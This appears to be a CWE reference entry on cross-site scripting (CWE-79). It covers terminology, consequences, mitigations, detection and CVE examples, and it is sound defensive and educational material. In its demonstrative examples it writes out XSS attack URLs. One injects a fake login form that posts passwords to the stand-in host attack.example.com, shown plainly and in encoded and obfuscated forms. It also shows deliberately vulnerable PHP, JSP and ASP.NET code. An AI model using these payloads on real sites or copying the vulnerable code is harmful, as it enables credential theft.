HTML Injection	Used as a synonym of stored (Type 2) XSS.
Reflected XSS / Non-Persistent XSS / Type 1 XSS	Used when a server application reads data directly from the HTTP request and reflects it back in the HTTP response.
Stored XSS / Persistent XSS / Type 2 XSS	Used when a server-side application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content.
DOM-Based XSS / Type 0 XSS	Used when a client-side application performs the injection of XSS into the page by manipulating the Domain Object Model (DOM).
CSS	In the early years after initial discovery of XSS, "CSS" was a commonly-used acronym. However, this would cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly.

Common Consequences

Impact	Details
Bypass Protection Mechanism; Read Application Data	Scope: Access Control, Confidentiality The most common attack performed with cross-site scripting involves the disclosure of private information stored in user cookies, such as session information. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity on behalf of the victim to an attacker-controlled system (such as sending all site cookies to a given E-mail address). This could be especially dangerous to the site if the victim has administrator privileges to manage that site. This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also.
Execute Unauthorized Code or Commands	Scope: Integrity, Confidentiality, Availability In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws, for example, "drive-by hacking."
Execute Unauthorized Code or Commands; Bypass Protection Mechanism; Read Application Data	Scope: Confidentiality, Integrity, Availability, Access Control The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running "Active X" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content.

Potential Mitigations

Phase(s)	Mitigation
Architecture and Design	Strategy: Libraries or Frameworks Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Implementation; Architecture and Design	Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Cascading Style Sheets and style property etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Architecture and Design; Implementation	Strategy: Attack Surface Reduction Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. Effectiveness: Limited Note: This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc.
Architecture and Design	For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design	Strategy: Parameterization If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Implementation	Strategy: Output Encoding Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
Implementation	With Struts, write all data from form beans with the bean's filter attribute set to true.
Implementation	Strategy: Attack Surface Reduction To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. Effectiveness: Defense in Depth
Implementation	Strategy: Input Validation Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities. Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address. Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
Architecture and Design	Strategy: Enforcement by Conversion When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Operation	Strategy: Firewall Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481]. Effectiveness: Moderate Note: An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.
Operation; Implementation	Strategy: Environment Hardening When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	80	Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	81	Improper Neutralization of Script in an Error Message Web Page
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	83	Improper Neutralization of Script in Attributes in a Web Page
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	84	Improper Neutralization of Encoded URI Schemes in a Web Page
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	85	Doubled Character XSS Manipulations
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	86	Improper Neutralization of Invalid Characters in Identifiers in Web Pages
ParentOf	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	87	Improper Neutralization of Alternate XSS Syntax
PeerOf	Composite - a Compound Element that consists of two or more distinct weaknesses, in which all weaknesses must be present at the same time in order for a potential vulnerability to arise. Removing any of the weaknesses eliminates or sharply reduces the risk. One weakness, X, can be "broken down" into component weaknesses Y and Z. There can be cases in which one weakness might not be essential to a composite, but changes the nature of the composite when it becomes a vulnerability.	352	Cross-Site Request Forgery (CSRF)
CanFollow	Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource.	113	Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	184	Incomplete List of Disallowed Inputs
CanPrecede	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	494	Download of Code Without Integrity Check

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	137	Data Neutralization Issues

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Relevant to the view "Architectural Concepts" (View-1008)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1019	Validate Inputs

Background Details

The Same Origin Policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.

When referring to XSS, the Domain of a website is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site.

Modes Of Introduction

Phase	Note
Implementation	REALIZATION: This weakness is caused during implementation of an architectural security tactic.

Applicable Platforms

Languages	Class: Not Language-Specific (Undetermined Prevalence)
Technologies	AI/ML (Undetermined Prevalence) Class: Web Based (Often Prevalent) Web Server (Undetermined Prevalence)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

The following code displays a welcome message on a web page based on the HTTP GET username parameter (covers a Reflected XSS (Type 1) scenario).

(bad code)

Example Language: PHP

$username = $_GET['username'];
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as

(attack code)

http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:

(attack code)

http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>

If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser:

(result)

<div class="header"> Welcome, <div id="stealPassword"> Please Login:

Username: <input type="text" name="username" /><br/>
Password: <input type="password" name="password" /><br/>
<input type="submit" value="Login" />

</form>

</div></div>

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):

(attack code)

trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22
stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input
%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php
%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text
%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A
+%3Cinput+type%3D%22password%22+name%3D%22password%22
+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:

(attack code)

trustedSite.example.com/welcome.php?username=<script+type="text/javascript">
document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073
\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064
\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067
\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D
\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063
\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F
\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D
\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061
\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068
\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070
\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D
\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061
\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065
\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073
\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075
\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073
\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022
\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E
\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D
\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C
\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.

Example 2

The following code displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

(bad code)

Example Language: JSP

<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.

(bad code)

Example Language: ASP.NET

<%
protected System.Web.UI.WebControls.TextBox Login;
protected System.Web.UI.WebControls.Label EmployeeID;
...
EmployeeID.Text = Login.Text;
%>

<p><asp:label id="EmployeeID" runat="server" /></p>

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Example 3

The following code displays a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

(bad code)

Example Language: JSP

<%Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
if (rs != null) {

rs.next();
String name = rs.getString("name");

}%>

Employee Name: <%= name %>

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.

(bad code)

Example Language: ASP.NET

<%
protected System.Web.UI.WebControls.Label EmployeeName;
...
string query = "select * from emp where id=" + eid;
sda = new SqlDataAdapter(query, conn);
sda.Fill(dt);
string name = dt.Rows[0]["Name"];
...
EmployeeName.Text = name;%>
<p><asp:label id="EmployeeName" runat="server" /></p>

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Example 4

The following code consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php

(bad code)

Example Language: PHP

$username = mysql_real_escape_string($username);
$fullName = mysql_real_escape_string($fullName);
$query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ;
mysql_query($query);
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php

(bad code)

Example Language: PHP

$query = 'Select * From users Where loggedIn=true';
$results = mysql_query($query);

if (!$results) {

exit;

}

//Print list of users to page
echo '<div id="userlist">Currently Active Users:';
while ($row = mysql_fetch_assoc($results)) {

echo '<div class="userNames">'.$row['fullname'].'</div>';

}
echo '</div>';

The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message.

Example 5

The following code is a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:

(bad code)

Example Language: PHP

$name = $_COOKIE["myname"];
$announceStr = "$name just logged in.";

//save HTML-formatted message to file; implementation details are irrelevant for this example.
saveMessage($announceStr);

An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:

(attack code)

The raw contents of the message file would look like:

(result)

For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry.

Example 6

The following code attempts to stop XSS attacks by removing all occurences of "script" in an input string.

(bad code)

Example Language: Java

public String removeScriptTags(String input, String mask) {

return input.replaceAll("script", mask);

}

Because the code only checks for the lower-case "script" string, it can be easily defeated with upper-case script tags.

Selected Observed Examples

Reference	Description
CVE-2024-49038	XSS in AI assistant
CVE-2024-54142	Plugin that enables AI features allows input with html entities, leading to XSS
CVE-2021-25926	Python Library Manager did not sufficiently neutralize a user-supplied search term, allowing reflected XSS.
CVE-2021-25963	Python-based e-commerce platform did not escape returned content on error pages, allowing for reflected Cross-Site Scripting attacks.
CVE-2021-1879	Universal XSS in mobile operating system, as exploited in the wild per CISA KEV.
CVE-2020-3580	Chain: improper input validation (CWE-20) in firewall product leads to XSS (CWE-79), as exploited in the wild per CISA KEV.
CVE-2014-8958	Admin GUI allows XSS through cookie.
CVE-2017-9764	Web stats program allows XSS through crafted HTTP header.
CVE-2014-5198	Web log analysis product allows XSS through crafted HTTP Referer header.
CVE-2008-5080	Chain: protection mechanism failure allows XSS
CVE-2006-4308	Chain: incomplete denylist (CWE-184) only checks "javascript:" tag, allowing XSS (CWE-79) using other tags
CVE-2007-5727	Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79)
CVE-2008-5770	Reflected XSS using the PATH_INFO in a URL
CVE-2008-4730	Reflected XSS not properly handled when generating an error message
CVE-2008-5734	Reflected XSS sent through email message.
CVE-2008-0971	Stored XSS in a security product.
CVE-2008-5249	Stored XSS using a wiki page.
CVE-2006-3568	Stored XSS in a guestbook application.
CVE-2006-3211	Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.
CVE-2006-3295	Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS (CWE-79).

Weakness Ordinalities

Ordinality	Description
Resultant	(where the weakness is typically related to the presence of some other weaknesses)

Detection Methods

Method

Details

Automated Static Analysis

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.

Effectiveness: Moderate

Black Box

Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.

Effectiveness: Moderate

Note:With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store.

Memberships

Nature	Type	ID	Name
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	635	Weaknesses Originally Used by NVD from 2008 to 2016
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	712	OWASP Top Ten 2007 Category A1 - Cross Site Scripting (XSS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	722	OWASP Top Ten 2004 Category A1 - Unvalidated Input
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	725	OWASP Top Ten 2004 Category A4 - Cross-Site Scripting (XSS) Flaws
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	751	2009 Top 25 - Insecure Interaction Between Components
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	801	2010 Top 25 - Insecure Interaction Between Components
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	811	OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	864	2011 Top 25 - Insecure Interaction Between Components
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	884	CWE Cross-section
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	931	OWASP Top Ten 2013 Category A3 - Cross-Site Scripting (XSS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	990	SFP Secondary Cluster: Tainted Input to Command
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1005	7PK - Input Validation and Representation
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1033	OWASP Top Ten 2017 Category A7 - Cross-Site Scripting (XSS)
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1131	CISQ Quality Measures (2016) - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1200	Weaknesses in the 2019 CWE Top 25 Most Dangerous Software Errors
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1308	CISQ Quality Measures - Security
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1337	Weaknesses in the 2021 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1340	CISQ Data Protection Measures
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1347	OWASP Top Ten 2021 Category A03:2021 - Injection
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1350	Weaknesses in the 2020 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1387	Weaknesses in the 2022 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1409	Comprehensive Categorization: Injection
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1425	Weaknesses in the 2023 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1430	Weaknesses in the 2024 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries).	1435	Weaknesses in the 2025 CWE Top 25 Most Dangerous Software Weaknesses
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1440	OWASP Top Ten 2025 Category A05:2025 - Injection

Vulnerability Mapping Notes

Usage	ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Reason	Acceptable-Use
Rationale	This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
Comments	Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.

Notes

Relationship

There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user's profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause.

Applicable Platform

XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid them.

Other

The attack methods for XSS can vary depending on the type of XSS and the attacker's goal.

Reflected XSS exploits (Type 1) occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser.

In a Stored XSS exploit (Type 2), the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

DOM-based XSS (Type 0) generally involves server-controlled, trusted script that is sent to the client, such as JavaScript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.

Other

Attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site.

Other

Cross-site scripting (XSS) vulnerabilities occur when:

Untrusted data enters a web application, typically from a web request.
The web application dynamically generates a web page that contains this untrusted data.
During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.
A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.
Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain.
This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain.

Taxonomy Mappings

Mapped Taxonomy Name	Node ID	Fit	Mapped Node Name
PLOVER			Cross-site scripting (XSS)
7 Pernicious Kingdoms			Cross-site Scripting
CLASP			Cross-site scripting
OWASP Top Ten 2007	A1	Exact	Cross Site Scripting (XSS)
OWASP Top Ten 2004	A1	CWE More Specific	Unvalidated Input
OWASP Top Ten 2004	A4	Exact	Cross-Site Scripting (XSS) Flaws
WASC	8		Cross-site Scripting
Software Fault Patterns	SFP24		Tainted input to command
OMG ASCSM	ASCSM-CWE-79

Related Attack Patterns

CAPEC-ID	Attack Pattern Name
CAPEC-209	XSS Using MIME Type Mismatch
CAPEC-588	DOM-Based XSS
CAPEC-591	Reflected XSS
CAPEC-592	Stored XSS
